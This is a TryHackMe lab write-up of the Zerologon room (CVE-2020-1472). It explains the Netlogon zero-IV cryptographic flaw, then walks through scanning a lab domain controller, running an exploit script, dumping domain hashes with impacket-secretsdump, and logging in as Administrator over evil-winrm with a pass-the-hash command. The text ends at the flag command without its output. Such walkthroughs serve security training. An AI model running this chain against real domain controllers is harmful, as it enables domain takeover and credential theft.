Zer0login THM Room

On September 14, Secura released a whitepaper for CVE-2020-1472, a vulnerability that allows an attacker to go from zero to Domain Admin in approximately one minute. They dubbed this vulnerability Zero Logon.

Zero Logon is a purely statistics-based attack that abuses a feature within MS-NRPC (Microsoft NetLogon Remote Protocol). MS-NRPC is a critical authentication component of Active Directory that handles authentication for user and machine accounts. In short, the attack targets a poor implementation of cryptography. To be more specific, Microsoft chose to use AES-CFB8 for a function called ComputeNetlogonCredential, which is normally fine, except that the Initialization Vector was hard-coded to all zeros instead of being a random value. When an attacker sends a message consisting only of zeros with an IV of zero, there is a 1-in-256 chance that the ciphertext will also be all zeros.

In this room, the ZeroLogon vulnerability is approached from a “Proof of Concept” (PoC) perspective, providing a breakdown of the vulnerable method behind this issue. TryHackMe does not condone illegal actions taken on the part of an individual (or group).

Analysing the MS-NRPC logon process

[Figure: Simplified Netlogon authentication handshake]

Step 1. The client creates a NetrServerReqChallenge and sends it with the following values:

  1. The DC

  2. The Target Device (Also the DC, in our case)

  3. A Nonce (In this case 16 Bytes of Zero).

Step 2. The server receives the NetrServerReqChallenge, generates its own nonce (called the Server Challenge), and sends the Server Challenge back to the client.

Step 3. The client will compute its NetLogon Credentials with the Server Challenge provided. It uses the NetrServerAuthenticate3 method which requires the following parameters:

  1. A Custom Binding Handle (Impacket handles this for us, it’s negotiated prior)

  2. An Account Name (The Domain Controller’s machine account name. ex: DC01$)

  3. A Secure Channel Type (Impacket sort of handles this for us, but we still need to specify it: nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel)

  4. The Computer Name (The Domain Controller ex: DC01)

  5. The Client Credential String (this will be 8 hextets of \x00 (16 Bytes of Zero))

  6. Negotiation Flags (The following value was observed from a Win10 client with Sign/Seal flags disabled: 0x212fffff, as provided by Secura)

Step 4. The server receives the NetrServerAuthenticate request and computes the same value itself using its own known-good values. If the results match, the server sends the required info back to the client.

At this point the attempt to exploit the Zero Logon vulnerability is under way. The steps above are looped through a certain number of times to attempt to exploit the vulnerability. The actual exploit occurs at Steps 3 and 4, where we are hoping for the server to arrive at the same computation as the client. This is where the 1-in-256 chance comes in.

[Figure: The Zerologon attack, which effectively boils down to filling particular message parameters with zeroes and retrying the handshake a few times in order to set an empty computer password on the DC.]

Step 5. If the server calculates the same value, the client re-verifies it and, once mutual agreement is confirmed, the two sides agree on a session key. The session key is used to encrypt communications between the client and the server, meaning authentication has succeeded.

Instantly Become Domain Admin

Scan target:

$ sudo nmap -sC -sV <target IP> -vv
Starting Nmap 7.93 ( ) at 2022-10-30 20:41 GMT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:41
Completed NSE at 20:41, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:41
Completed NSE at 20:41, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:41
Completed NSE at 20:41, 0.00s elapsed
Initiating Ping Scan at 20:41
Scanning [4 ports]
Completed Ping Scan at 20:41, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:41
Completed Parallel DNS resolution of 1 host. at 20:41, 0.01s elapsed
Initiating SYN Stealth Scan at 20:41
Scanning [1000 ports]
Discovered open port 3389/tcp on
Discovered open port 139/tcp on
Discovered open port 135/tcp on
Discovered open port 80/tcp on
Discovered open port 445/tcp on
Discovered open port 53/tcp on
Discovered open port 636/tcp on
Discovered open port 389/tcp on
Discovered open port 3268/tcp on
Discovered open port 464/tcp on
Discovered open port 3269/tcp on
Discovered open port 88/tcp on
Discovered open port 593/tcp on
Completed SYN Stealth Scan at 20:41, 0.87s elapsed (1000 total ports)
Initiating Service scan at 20:41
Scanning 13 services on
Completed Service scan at 20:43, 142.72s elapsed (13 services on 1 host)
NSE: Script scanning
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:43
Completed NSE at 20:44, 15.02s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:44
Completed NSE at 20:44, 3.42s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:44
Completed NSE at 20:44, 0.00s elapsed
Nmap scan report for
Host is up, received echo-reply ttl 127 (0.047s latency).
Scanned at 2022-10-30 20:41:23 GMT for 162s
Not shown: 987 closed tcp ports (reset)
53/tcp   open  domain?       syn-ack ttl 127
80/tcp   open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-10-30 20:41:30Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: hololive.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 127
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: hololive.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack ttl 127
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: HOLOLIVE
|   NetBIOS_Domain_Name: HOLOLIVE
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: hololive.local
|   DNS_Computer_Name: DC01.hololive.local
|   Product_Version: 10.0.17763
|_  System_Time: 2022-10-30T20:43:47+00:00
|_ssl-date: 2022-10-30T20:44:05+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.hololive.local
| Issuer: commonName=DC01.hololive.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-10-29T20:30:54
| Not valid after:  2023-04-30T20:30:54
| MD5:   62030478ed5f961d8de78c4320b6ecb4
| SHA-1: 61f06fd27c274c25bcfd18bf9071deedde71480e
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| smb2-time: 
|   date: 2022-10-30T20:43:49
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 44856/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 58805/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 55710/udp): CLEAN (Timeout)
|   Check 4 (port 28882/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:44
Completed NSE at 20:44, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:44
Completed NSE at 20:44, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:44
Completed NSE at 20:44, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 162.80 seconds
           Raw packets sent: 1004 (44.152KB) | Rcvd: 1001 (40.080KB)

Get the python script:


Exploit the domain controller:

$ python DC01 <IP target>

 _____                   __                         
/ _  / ___ _ __ ___     / /  ___   __ _  ___  _ __  
\// / / _ \ '__/ _ \   / /  / _ \ / _` |/ _ \| '_ \ 
 / //\  __/ | | (_) | / /__| (_) | (_| | (_) | | | |
/____/\___|_|  \___/  \____/\___/ \__, |\___/|_| |_|
                Vulnerability Discovered by Tom Tervoort
                              Exploit by Ronnie Bartwitz
Performing authentication attempts...
Failure to Autheticate at attempt number: 321
Zero Logon successfully exploited, changing password.

Dump secrets:

$ impacket-secretsdump -just-dc -no-pass DC01\$@<IP target>
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] Cleaning up... 

Go in to get the root flag:

# evil-winrm -u Administrator -H 3f3ef89114fb063e3d7fc23c20f65568 -i <IP target>       

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github:

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls

    Directory: C:\Users\Administrator\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/20/2020   2:02 PM             24 root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt